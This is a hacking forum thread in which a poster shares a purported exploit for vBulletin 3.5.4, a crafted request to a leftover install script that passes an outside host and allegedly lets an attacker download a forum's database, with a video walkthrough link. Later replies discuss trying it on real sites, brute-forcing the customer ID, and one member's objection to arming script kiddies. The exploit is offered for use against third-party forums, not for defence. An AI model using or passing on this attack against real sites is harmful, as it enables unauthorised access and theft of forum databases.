M4k3

How to hack a vbulletin 3.5.4 (Video)

36 posts in this topic

Hello,

Here I will show you how to hack a vBulletin 3.5.4:

video:

http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html

exploit:

##############################################
vBulletin 3.5.4 exploit.....install path is open or not secure
###############################################

Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com
Remote : Yes
Critical Level : Dangerous
############################################
Affected software description :

Application : vbulletin
version : latest version [ 3.60 Release 4 ]
URL : http://www.vbulletin.com

########################################
Exploit:

www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://ww.pldsoft.com

when it works, you can still download the database.....

########################################
Contact:

Nick: M4k3
E-mail: mikathebest2003@yahoo.de
Homepage: http://www.pldsoft.com

Edited by M4k3
0

Share this post


Link to post
Share on other sites

From what I remember, when you install VBulletin and get done with it, doesn't it make you delete the /install/ folder and everything under it?

EDIT: Just tried it on a friends site, you need to have a Customer ID in order to continue with the step

Edited by Trikk
1

Share this post


Link to post
Share on other sites

You only delete the index.php, in the folder.

check it out on this site:

undergr0und.net

Edited by M4k3
0

Share this post


Link to post
Share on other sites

That site does not have a vBulletin forum :huh:

Underground Electronic Network Security Lab.

www.undergr0und.net

Powered by zero blog

EDIT: ruiner zer0 - didn't he use to be on the CIA forums? :blink:

Edited by Trikk
0

Share this post


Link to post
Share on other sites

heh, it wasn't links on the main site.

very nice though

Edited by Trikk
0

Share this post


Link to post
Share on other sites

Thx, now i will try to make a perl exploit for it.

Because when you would enter on many boards /install/ you need a number and i will write a code who will break it down.

0

Share this post


Link to post
Share on other sites

This *is* a remote exploit, change your header.

BTW, please spell check this thing, it's vBulletin not vbulltin.

0

Share this post


Link to post
Share on other sites

How do you detect if the forum is vulnerable?(besides the manual way).

Or is there anyway to bruteforce the customer key?

Oh yeah and all the forums in the vid are patched : <

Edited by xof7
0

Share this post


Link to post
Share on other sites

Well, you have try it on nulled version.

I will make a new exploits who will break down the number code what you have enter.

The Forums are now protected....because i have warn the admins...

0

Share this post


Link to post
Share on other sites

Hey guys, I don't mean to rain on any parades here, or backseat mod... but:

1.) Should you really be so openly talking about specific vulnerable sites on the internet? Sure does look like you're intending to penetrate them. This is a forum that appears on Google, is it beyond belief that the Feds are reading this very post?

2.) Shouldn't this be in the Newbie HQ? Youve got a video showing how to run a perl script? I mean, it's pretty cool that you found this vulnerability (or did you just write the 'sploit?) but do we _really_ need to be handing children the proverbial handgun? Anyone who uses this script isn't automaticaly a "hacker", they just watched a video. No different than kids running winnuke (in terms of skill level), am I wrong?

Enabling script kiddies doesn't make you a hacker, it just ensures the three letter agencies will open a dossier on you.

0

Share this post


Link to post
Share on other sites

Then you have to create a forum....for people who have more knowlege then other.

0

Share this post


Link to post
Share on other sites

How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.

0

Share this post


Link to post
Share on other sites

How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.

There are certainly people to show them the way, but to answer your question: What we all did. We read. A lot. And then read some more. For most of the waking hours of the day for years on and, burning with obsession to understand it all.

If you had explained where the vulnerability exists in the software, which attack you're using (remote inclusion?) how you were able to extract the data, and how it could have been patched, then you're teaching. If you're just teaching how to run a perl script, than you might be jumping the gun. It just feels like you're teaching them to pull the trigger before teaching them how to load, how to cock, how to aim, and how to not kill anyone they weren't intending to. If they can't run an exploit then they probably don't know linux, and if they don't know linux than what are they going to do once they gain access into the box?

I agree there should be a forum for people who don't know the basics. We have one, it's called the Newbie HQ :) Don't think by posting in there that you're a newbie, you're helping out people who know less.

I seriously hope you don't misinterpret my concerns as anything more than an older cousin, making sure you don't get into trouble and hopefully pointing you in the right direction...

[edit: typos]

Edited by stonersavant
0

Share this post


Link to post
Share on other sites

How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.

There are certainly people to show them the way, but to answer your question: What we all did. We read. A lot. And then read some more. For most of the waking hours of the day for years on and, burning with obsession to understand it all.

If you had explained where the vulnerability exists in the software, which attack you're using (remote inclusion?) how you were able to extract the data, and how it could have been patched, then you're teaching. If you're just teaching how to run a perl script, than you might be jumping the gun. It just feels like you're teaching them to pull the trigger before teaching them how to load, how to cock, how to aim, and how to not kill anyone they weren't intending to. If they can't run an exploit then they probably don't know linux, and if they don't know linux than what are they going to do once they gain access into the box?

I agree there should be a forum for people who don't know the basics. We have one, it's called the Newbie HQ :) Don't think by posting in there that you're a newbie, you're helping out people who know less.

I seriously hope you don't misinterpret my concerns as anything more than an older cousin, making sure you don't get into trouble and hopefully pointing you in the right direction...

[edit: typos]

lol. did u even watch the vid for the exploit or read his post?

0

Share this post


Link to post
Share on other sites

Sure I did. Did you completely forget about the part, just a few posts above ours, where you are pointing out specific sites to attack? Looks like you had the good sense to edit them out.

Come on guys, this isn't a leetness pissing contest.

Edited by stonersavant
0

Share this post


Link to post
Share on other sites

All you do in this vuln is append a directory, a file name, and an argument to the file. this is hardly even an exploit... With something so easy it should be obvious that the newbs are going to be rushing to it somehow.

0

Share this post


Link to post
Share on other sites

So it seems that by setting up a password durring the vB install this "exploit" is overcome. Thanks for putting what you got up for others to see but it seems that this would only work on an idiot's site.

0

Share this post


Link to post
Share on other sites

So it seems that by setting up a password durring the vB install this "exploit" is overcome. Thanks for putting what you got up for others to see but it seems that this would only work on an idiot's site.

The internet is full of idiot's site.

0

Share this post


Link to post
Share on other sites

two things... how did you come across this.. and your video is offline due to complaints er somthing like that... could you upload it again?

0

Share this post


Link to post
Share on other sites

It will only work if the person hasnt payd for vBull and they leave the install folder around.

why hasnt payd? cause if you do pay, you get prompted for the user ID. if you dont, then you are doing no harm wreckin the forum.

is this bumping? ;p

Edited by Enkil
0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now